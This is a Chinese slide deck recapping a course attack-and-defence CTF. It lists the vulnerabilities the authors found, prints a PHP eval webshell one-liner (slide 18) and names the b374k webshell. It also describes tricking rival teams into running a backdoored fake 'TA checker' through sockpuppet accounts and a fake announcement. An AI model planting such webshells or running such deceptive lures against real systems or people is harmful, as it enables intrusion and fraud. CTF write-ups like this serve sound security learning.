打網路安全 CTF 的一些心得

1. NSCTF
Takeshi & NaOH

2. 大家早

3. 我們是

4. NSCTF

5. NSCTF
Network Security CTF
(好啦，這其實是我自己亂下的 XD)

6. About Takeshi
HITCON staff 2012, 2013, 2014
SITCON staff 2013, 2014, 2015
COSCUP, WebConf…..
C, Python, JavaScript…….
RuCTF, CTCTF
Web security

7. About NaOH
W2CNLab Master student
Python, C
No experience in wargame &
CTF

8. 我們都不是駭客

9. https://www.flickr.com/photos/sitcon

10. http://devco.re

11. 先從 SOP 開始講

12. Before before CTF
分析用的 python script
For binary — system, scanf, strcpy, memcpy
For web — mysql_*, echo, eval, system….
熟悉 gdb
先把可用的 sqli 先蒐集一遍

13. Before CTF
找洞 -> 寫攻擊 Script -> 測試 -> 補洞
寫 HoneyPot (ssp)

14. CTF
打人 -> 被打 -> 阿阿阿！ -> 補洞 -> 寫 Script -> 打人

16. SSP
Buffer Overflow : login, leave message, change
money, initial_pinfo
Integer overflow : million, betting, changeback
Command execution : changeback
Logic error : betting
Default password : login
Malicious login session

17. PMC
SQLi : id query, name query
XSS : message
Backdoor upload : upload
Upload header bypass : upload
getimagesize bypass : upload
.htaccess : upload
Malicious function execution

18. pmc backdoor
<?php eval($_POST['c']); ?>

19. pmc backdoor
b347k webshell

20. pmc & ssp backdoor

21. Social engineering

22. 帳號/IP 多
Takeshi_tw, TA_ckchen_, TA_zywu_, TA_zywv, Bob_T, Eric….,

23. 布局要夠長
第一天開始布局，第三天釋出

24. 下手時機點對
大家都累了，或是 Service 相當不穩定

25. 後門要藏的隱密
ssp TLE 爆炸 OAO
pmc OK

27. 寫一個相當真的檢查器
檢查 www/pc, www/message 權限
檢查與助教機器連線
檢查 message 留言

28. 寫一個看起來很真的公告
url 裡面有寫 ns-ta-checker
用一個沒有用過的主機當做載點，避免 IP 重複起讓人疑心
附贈皮卡丘

30. 等待下載

31. 獲得 flag
感覺很多，但實際上有效的只有 1~2 個 flag

33. –TA
「學生打完期末會不會對人性感到失望啊!?
」

34. –另一個TA
「別人離鄉背井來這邊讀書結果被騙」

35. 結
NSCTF，玩的很開心，也很累
學到更多打 CTF 的技巧
社交工程應該是不適用於其他 CTF…..